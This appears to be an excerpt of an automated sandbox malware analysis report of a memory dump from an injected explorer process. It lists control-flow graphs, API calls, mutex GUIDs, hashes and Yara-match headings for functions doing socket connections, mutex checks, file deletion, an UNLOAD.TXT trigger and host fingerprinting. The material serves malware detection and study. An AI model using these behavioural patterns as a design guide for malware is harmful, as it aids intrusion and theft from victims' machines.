                                                                                                            control_flow_graph 462 e23b40-e23b7b socket 463 e23b84-e23b9b WSAGetLastError WSACreateEvent 462->463 464 e23b7d-e23b7f 462->464 466 e23ba7-e23bbf WSAEventSelect 463->466 467 e23b9d 463->467 465 e24199-e241a0 464->465 469 e23bc1 466->469 470 e23bcb-e23bd5 466->470 468 e2417c-e24197 shutdown closesocket 467->468 468->465 471 e24171-e24176 CloseHandle 469->471 472 e23bdb-e23be5 470->472 473 e23dee-e23e03 470->473 471->468 476 e23be7-e23bf2 472->476 477 e23bf4-e23c0b inet_addr 472->477 474 e23e15-e23e32 inet_addr 473->474 475 e23e05-e23e13 473->475 478 e23e79-e23ec6 htons connect 474->478 479 e23e34-e23e53 gethostbyname 474->479 475->478 480 e23c46-e23c84 htons connect 476->480 477->480 481 e23c0d-e23c26 gethostbyname 477->481 478->471 486 e23ecc-e23ed7 WSAGetLastError 478->486 484 e23e55-e23e6d 479->484 485 e23e6f 479->485 482 e23c8a-e23c95 WSAGetLastError 480->482 483 e23de9 480->483 487 e23c28-e23c3a 481->487 488 e23c3c 481->488 482->483 489 e23c9b-e23cb6 482->489 483->471 484->478 485->471 486->471 490 e23edd-e23efe 486->490 487->480 488->471 491 e23cb8-e23ccb 489->491 492 e23ccf-e23cfa WSAWaitForMultipleEvents 489->492 493 e23f20-e23f57 WSAWaitForMultipleEvents 490->493 494 e23f00-e23f19 490->494 491->492 495 e23d19-e23d21 492->495 496 e23cfc-e23d14 WSACloseEvent closesocket 492->496 497 e23f70-e23f88 WSACloseEvent closesocket 493->497 498 e23f59-e23f64 493->498 494->493 499 e23d23-e23d3b WSACloseEvent closesocket 495->499 500 e23d40-e23d45 495->500 496->465 497->465 498->497 501 e23f66-e23f6e 498->501 499->465 503 e23d47-e23d5e WSAEnumNetworkEvents 500->503 504 e23dc5-e23dca 500->504 501->497 502 e23f8d-e23f95 501->502 502->471 506 e23f9b-e23fb5 WSAEnumNetworkEvents 502->506 507 e23d60-e23d78 closesocket WSACloseEvent 503->507 508 e23d7d-e23d86 503->508 504->483 505 e23dcc-e23de4 closesocket WSACloseEvent 504->505 505->465 509 e23fb7-e23fcf WSACloseEvent closesocket 506->509 510 e23fd4-e23fdc 506->510 507->465 511 e23da5-e23dae 508->511 512 e23d88-e23da0 closesocket WSACloseEvent 508->512 509->465 513 e23ffb-e24005 510->513 514 e23fde-e23ff6 WSACloseEvent closesocket 510->514 511->504 515 e23db0-e23dc0 WSACloseEvent 511->515 512->465 516 e24022-e2403f inet_addr 513->516 517 e24007-e24020 513->517 514->465 515->465 519 e24041-e2404c 516->519 520 e2404e 516->520 518 e24059-e24061 517->518 521 e24067-e240ce call e241b0 518->521 522 e240ea-e240f2 518->522 519->518 520->518 528 e240d0-e240e0 CloseHandle 521->528 529 e240e5 521->529 522->471 523 e240f4-e2415d call e24340 522->523 523->471 530 e2415f-e2416f CloseHandle 523->530 528->465 529->471 530->465 530->471
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorEventLastclosesocketshutdownsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1739004367-0
                                                                                                            • Opcode ID: 69f75d45d796d6a2e56a1c98d5b3a4757a772b6911a268e01388c250a9e22193
                                                                                                            • Instruction ID: 901d0da4fb920733cd2985bebcd5732ef63f0480be19820b665961ff15b7f2f1
                                                                                                            • Opcode Fuzzy Hash: 69f75d45d796d6a2e56a1c98d5b3a4757a772b6911a268e01388c250a9e22193
                                                                                                            • Instruction Fuzzy Hash: CFF1EB76219AD0CAD7608F25F84479AB7B0F798B94F102516EA8A97B68DF3DC584CF00
                                                                                                            Function 00E25F4B Relevance: 54.4, APIs: 30, Strings: 1, Instructions: 156synchronizationmemorythreadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 598 e25f4b 599 e25f6e-e25f7e call e26f30 598->599 602 e26257-e2625e 599->602 603 e25f84-e25fb1 setsockopt 599->603 606 e26283 602->606 607 e26260-e26267 602->607 604 e25fb7-e25fd5 CreateEventW 603->604 605 e26209-e2620f 603->605 604->605 609 e25fdb-e25ffc LocalAlloc 604->609 610 e26211-e26226 shutdown closesocket 605->610 611 e2622c-e26255 CloseHandle call e21f90 605->611 608 e26287-e26299 WaitForSingleObject 606->608 607->606 612 e26269-e26270 607->612 614 e25e89-e25e90 608->614 615 e26002-e26047 CreateThread 609->615 616 e261f5-e26200 CloseHandle 609->616 610->611 611->606 612->606 613 e26272-e26279 612->613 613->606 618 e2627b-e2627d ExitProcess 613->618 619 e25e96-e25eaa WaitForSingleObject 614->619 620 e2629e-e262b0 WaitForSingleObject 614->620 621 e261dc-e261e5 615->621 622 e2604d-e2605d GetTickCount 615->622 616->605 619->620 624 e25eb0-e25eb8 619->624 625 e262b2-e262c7 SetEvent WaitForSingleObject 620->625 626 e262cd-e262d3 620->626 621->616 627 e261e7-e261ef LocalFree 621->627 628 e26064-e2606b 622->628 629 e25ef0-e25f23 SleepEx WaitForSingleObject 624->629 630 e25eba-e25ece WaitForSingleObject 624->630 625->626 631 e262d5-e262e0 CloseHandle 626->631 632 e262e9-e262ef 626->632 627->616 633 e26173-e261d3 shutdown closesocket SetEvent WaitForSingleObject call e26dd0 call e13ae0 CloseHandle 628->633 634 e26071-e26079 628->634 637 e25f36-e25f3d 629->637 638 e25f25-e25f32 WaitForSingleObject 629->638 630->629 636 e25ed0-e25ee7 WaitForSingleObject 630->636 631->632 641 e262f1-e262fc CloseHandle 632->641 642 e26305 632->642 633->621 639 e26096-e260aa WaitForSingleObject 634->639 640 e2607b-e2608f WaitForSingleObject 634->640 644 e25ee9 636->644 645 e25eee 636->645 646 e25f52-e25f5a 637->646 647 e25f3f-e25f47 637->647 638->637 649 e260b1-e260c5 WaitForSingleObject 639->649 650 e260ac 639->650 640->639 648 e26091 640->648 641->642 651 e2630a-e26328 CloseHandle 642->651 652 e26305 call e26dd0 642->652 644->620 645->614 657 e25f60-e25f68 646->657 658 e26285 646->658 655 e25f49 647->655 656 e25f4d 647->656 648->633 659 e260c7 649->659 660 e260cc-e260f6 call e23370 649->660 650->633 663 e26340-e26346 651->663 664 e2632a-e2633a ReleaseMutex CloseHandle 651->664 652->651 655->599 656->608 657->599 657->658 658->620 659->633 668 e260fa-e26102 660->668 669 e260f8 660->669 666 e26353-e26367 CloseHandle 663->666 667 e26348-e2634d CloseHandle 663->667 664->663 667->666 671 e26104-e2610f WSAGetLastError 668->671 672 e2612b-e26133 668->672 669->633 673 e26111-e26123 GetTickCount 671->673 674 e26129 671->674 675 e26163-e2616e SleepEx 672->675 676 e26135-e2613b GetTickCount 672->676 677 e26127 673->677 678 e26125 673->678 674->633 675->628 679 e26142-e2615f call e23370 676->679 677->672 678->633 679->675 682 e26161 679->682 682->679
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • {8E8A4502-77C1-498F-9A62-1CFFC74945A4}, xrefs: 00E26249
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                                                                                                            • String ID: {8E8A4502-77C1-498F-9A62-1CFFC74945A4}
                                                                                                            • API String ID: 2113405211-3742775516
                                                                                                            • Opcode ID: 448dfe744ec1d3ef1730e3037207e70b8fb484f9580361bde58bd3a9b703e152
                                                                                                            • Instruction ID: f137288a88ab53c1cad3b5a3e42afbd8861ac4068f05c57e95e4b2e9b8cad908
                                                                                                            • Opcode Fuzzy Hash: 448dfe744ec1d3ef1730e3037207e70b8fb484f9580361bde58bd3a9b703e152
                                                                                                            • Instruction Fuzzy Hash: 28911231114AD0C2E714DF65F95835EB3A1F7E0794F206626D68AA3AB8CFBDC489CB40
                                                                                                            Function 00E1D590 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 226librarymemoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 683 e1d590-e1d5e8 OpenMutexW LoadLibraryW LocalAlloc 684 e1d5f4-e1d609 GetModuleFileNameW 683->684 685 e1d5ea 683->685 687 e1d615-e1d631 call e21e10 684->687 688 e1d60b 684->688 686 e1d978-e1d993 call e01860 call e04140 call e04560 call e05290 call e17910 685->686 714 e1d995-e1d997 ExitProcess 686->714 715 e1d99d-e1d9aa call e224e0 686->715 693 e1d633 687->693 694 e1d638-e1d66e OpenMutexW 687->694 688->686 696 e1da1b-e1da22 693->696 697 e1d670 694->697 698 e1d67a-e1d681 call e017c0 694->698 697->686 704 e1d683 698->704 705 e1d68d-e1d694 call e04050 698->705 704->686 712 e1d6a0-e1d6a7 call e178a0 705->712 713 e1d696 705->713 720 e1d6b3-e1d6ba call e13a60 712->720 721 e1d6a9 712->721 713->686 723 e1d9b9-e1d9bf 715->723 724 e1d9ac-e1d9b3 CloseHandle 715->724 728 e1d6c6-e1d6cd call e22210 720->728 729 e1d6bc 720->729 721->686 726 e1d9c1-e1d9c6 CloseHandle 723->726 727 e1d9cc-e1d9e8 723->727 724->723 726->727 730 e1d9f7-e1d9fd 727->730 731 e1d9ea-e1d9f1 CloseHandle 727->731 737 e1d6d9-e1d6e0 call e05230 728->737 738 e1d6cf 728->738 729->686 733 e1da0a-e1da11 730->733 734 e1d9ff-e1da04 LocalFree 730->734 731->730 733->696 735 e1da13-e1da15 ExitProcess 733->735 734->733 741 e1d6e2 737->741 742 e1d6ec-e1d6f3 call e044b0 737->742 738->686 741->686 745 e1d6f5 742->745 746 e1d6ff-e1d718 call e09c50 742->746 745->686 749 e1d748-e1d764 call e1e280 call e09d70 746->749 750 e1d71a-e1d739 CreateMutexExW 746->750 757 e1d794-e1d7b0 call e1e280 call e09e90 749->757 758 e1d766-e1d785 CreateMutexW 749->758 751 e1d740 750->751 752 e1d73b 750->752 751->749 752->696 765 e1d7e0-e1d7f3 call e1e280 757->765 766 e1d7b2-e1d7d1 CreateMutexW 757->766 759 e1d787 758->759 760 e1d78c 758->760 759->696 760->757 771 e1d8f2-e1d8f9 765->771 772 e1d7f9-e1d800 765->772 767 e1d7d3 766->767 768 e1d7d8 766->768 767->696 768->765 773 e1d911-e1d918 771->773 774 e1d8fb-e1d90d WaitForSingleObject 771->774 772->771 775 e1d806-e1d80b 772->775 776 e1d927 773->776 777 e1d91a-e1d925 773->777 774->686 778 e1d81b 775->778 779 e1d80d-e1d812 775->779 780 e1d932-e1d972 WaitForMultipleObjects SetEvent 776->780 777->780 782 e1d826-e1d82e 778->782 779->778 781 e1d814-e1d819 779->781 780->686 781->778 783 e1d856-e1d85d 781->783 782->783 784 e1d830 call e0fa60 782->784 783->771 786 e1d863-e1d885 call e07770 783->786 787 e1d835-e1d837 784->787 786->771 791 e1d887 786->791 787->783 789 e1d839-e1d854 Sleep 787->789 789->782 792 e1d892-e1d8a3 GetFileAttributesW 791->792 793 e1d8a5-e1d8b5 DeleteFileW 792->793 794 e1d8e4-e1d8ec LocalFree 792->794 795 e1d8e0 793->795 796 e1d8b7-e1d8cf 793->796 794->771 795->794 797 e1d8d1 796->797 798 e1d8d3-e1d8de SleepEx 796->798 797->794 799 e1d8e2 798->799 799->792
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32 ref: 00E1D5A5
                                                                                                            • LoadLibraryW.KERNEL32 ref: 00E1D5B9
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E1D5D7
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E1D601
                                                                                                            • ExitProcess.KERNEL32 ref: 00E1D997
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E224FF
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E2251B
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E22532
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E22549
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E22565
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E2257C
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E22593
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E225AA
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E225C6
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E225DD
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E225F4
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E22610
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E22627
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E2263E
                                                                                                            • CloseHandle.KERNEL32 ref: 00E1D9B3
                                                                                                            • CloseHandle.KERNEL32 ref: 00E1D9C6
                                                                                                            • CloseHandle.KERNEL32 ref: 00E1D9F1
                                                                                                            • LocalFree.KERNEL32 ref: 00E1DA04
                                                                                                            • ExitProcess.KERNEL32 ref: 00E1DA15
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                                                            • String ID: KERNEL32.DLL${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}${7E105FD4-6112-4FB9-A722-91E984087449}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 2953619224-1144826392
                                                                                                            • Opcode ID: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                                                            • Instruction ID: b1d4aa33ac36569f3ecdfb4a1cdf45983bdec690cd602fc275fd2f157d3956bf
                                                                                                            • Opcode Fuzzy Hash: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                                                            • Instruction Fuzzy Hash: 16B15C3110CB80C6E724DB24FD483DA77A0FB94398F506916E68AB66A4DF7DC5C8CB01
                                                                                                            Function 00E16790 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 239memoryfilestringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 800 e16790-e167aa call e159a0 803 e167b3-e167cf call e0f790 800->803 804 e167ac-e167ae 800->804 808 e167d5-e16800 call e15a80 803->808 809 e16cec 803->809 805 e16cee-e16cf5 804->805 812 e16ce1-e16ce6 LocalFree 808->812 813 e16806-e16821 LocalAlloc 808->813 809->805 812->809 814 e16827-e16894 lstrcpyW StrStrIW CreateFileW 813->814 815 e16cbb-e16cc1 813->815 818 e16cb0-e16cb5 LocalFree 814->818 819 e1689a-e168b0 GetFileSize 814->819 816 e16cc3-e16cc8 LocalFree 815->816 817 e16cce-e16cd4 815->817 816->817 817->812 820 e16cd6-e16cdb LocalFree 817->820 818->815 821 e168b6-e168d2 LocalAlloc 819->821 822 e16c9d-e16ca3 819->822 820->812 821->822 823 e168d8-e16909 ReadFile 821->823 822->818 824 e16ca5-e16caa CloseHandle 822->824 825 e16c92-e16c97 LocalFree 823->825 826 e1690f-e16974 CloseHandle 823->826 824->818 825->822 827 e16986-e16994 826->827 828 e169e0-e169fb call e20d00 827->828 829 e16996-e169de call e1cee0 827->829 828->825 834 e16a01-e16a23 call e17330 828->834 829->827 838 e16a29-e16a4a LocalAlloc 834->838 839 e16c3d-e16c46 834->839 838->839 840 e16a50-e16a71 LocalAlloc 838->840 839->825 841 e16c48-e16c66 call e172b0 839->841 842 e16a77-e16b41 call e28b30 lstrcpyW * 3 840->842 843 e16c2f-e16c37 LocalFree 840->843 841->825 848 e16c68-e16c8c VirtualFree 841->848 851 e16c21-e16c29 LocalFree 842->851 852 e16b47-e16b52 842->852 843->839 848->825 851->843 853 e16b64-e16b6c 852->853 853->851 854 e16b72-e16b92 853->854 855 e16b98-e16bc3 854->855 856 e16c1c 854->856 857 e16be3-e16c17 LocalFree * 4 855->857 858 e16bc5-e16bdb 855->858 856->853 857->805 858->857
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                                                            • String ID: .DLL
                                                                                                            • API String ID: 2968648924-899428287
                                                                                                            • Opcode ID: ef9ae1e3439dff997b194165b7588088cf234c411f7acbd89f642e98992375f6
                                                                                                            • Instruction ID: 6b88ba29e605e9966cddefb55dede03bb68c837bdfd07612189726e82b2a2f71
                                                                                                            • Opcode Fuzzy Hash: ef9ae1e3439dff997b194165b7588088cf234c411f7acbd89f642e98992375f6
                                                                                                            • Instruction Fuzzy Hash: 76D1D336208BC082E764DB15F89439AB7A1F3C4794F505626DADE93BA8DF3DD489CB40
                                                                                                            Function 00E259A0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 100librarymemoryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1064 e259a0-e259c2 LocalAlloc 1065 e25b91 1064->1065 1066 e259c8-e259e0 LoadLibraryW 1064->1066 1067 e25b93-e25b9a 1065->1067 1068 e259e2-e259ef LocalFree 1066->1068 1069 e259f4-e25a11 GetProcAddress 1066->1069 1068->1067 1070 e25a13-e25a20 LocalFree 1069->1070 1071 e25a25-e25a4c call e291b0 RtlGetVersion 1069->1071 1070->1067 1074 e25a60-e25ad1 GetUserGeoID gethostname 1071->1074 1075 e25a4e-e25a5b LocalFree 1071->1075 1076 e25b86-e25b8b LocalFree 1074->1076 1077 e25ad7-e25af6 gethostbyname 1074->1077 1075->1067 1076->1065 1077->1076 1078 e25afc-e25b41 GetComputerNameExW 1077->1078 1078->1076 1079 e25b43-e25b6b GetUserNameW 1078->1079 1079->1076 1080 e25b6d-e25b84 GetTickCount64 1079->1080 1080->1067
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E259B1
                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259CF
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259E7
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E25A00
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E25A18
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AddressAllocLibraryLoadProc
                                                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                                                            • API String ID: 2539306102-196638859
                                                                                                            • Opcode ID: 36a3cc2a456c8631fadbe0c98f8f55923dc29c10ce112e1fe93d10f9b6ad3a27
                                                                                                            • Instruction ID: 16841360f78cc5d6b6e650bb3ef699943a64383cee3886e765afdf88e75e6231
                                                                                                            • Opcode Fuzzy Hash: 36a3cc2a456c8631fadbe0c98f8f55923dc29c10ce112e1fe93d10f9b6ad3a27
                                                                                                            • Instruction Fuzzy Hash: 9751F836219A84C6E724CF15F59839A77B0F7D8B88F401526DA8E97768DF3DC944CB00
                                                                                                            Function 00E09AC0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 77memoryfilesynchronizationCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1081 e09ac0-e09ac5 1082 e09ac9-e09ae0 WaitForSingleObject 1081->1082 1083 e09c42-e09c48 1082->1083 1084 e09ae6-e09aff SHGetKnownFolderPath 1082->1084 1085 e09b05-e09b20 LocalAlloc 1084->1085 1086 e09c3d 1084->1086 1087 e09c32-e09c37 CoTaskMemFree 1085->1087 1088 e09b26-e09b93 call e28378 CreateFileW 1085->1088 1086->1082 1087->1086 1091 e09c14-e09c1a 1088->1091 1092 e09b95-e09b9c 1088->1092 1095 e09c27-e09c2c LocalFree 1091->1095 1096 e09c1c-e09c21 CloseHandle 1091->1096 1093 e09bb1-e09bfa CloseHandle LocalFree CoTaskMemFree OpenEventW 1092->1093 1094 e09b9e-e09ba5 1092->1094 1098 e09c12 1093->1098 1099 e09bfc-e09c0c SetEvent CloseHandle 1093->1099 1094->1091 1097 e09ba7-e09baf call e0fba0 1094->1097 1095->1087 1096->1095 1097->1091 1097->1093 1098->1083 1099->1098
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                                                                                                            • String ID: %s\%s$UNLOAD.TXT${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 2734627627-3124979191
                                                                                                            • Opcode ID: 10c1d22eb571fe77a4ef00b0e6d2917a271e4e91fa89b4f9c3857c0d8971b072
                                                                                                            • Instruction ID: 5b01ee213a3a04ee500f3a288b8879025aeeef80636184e026fcfc57f3ac8233
                                                                                                            • Opcode Fuzzy Hash: 10c1d22eb571fe77a4ef00b0e6d2917a271e4e91fa89b4f9c3857c0d8971b072
                                                                                                            • Instruction Fuzzy Hash: 7A411F31504AC082E7209F54F95835AB3B0F7D57B4F601B26E6AAA6AF9CF7DC485CB00
                                                                                                            Function 00E09C50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
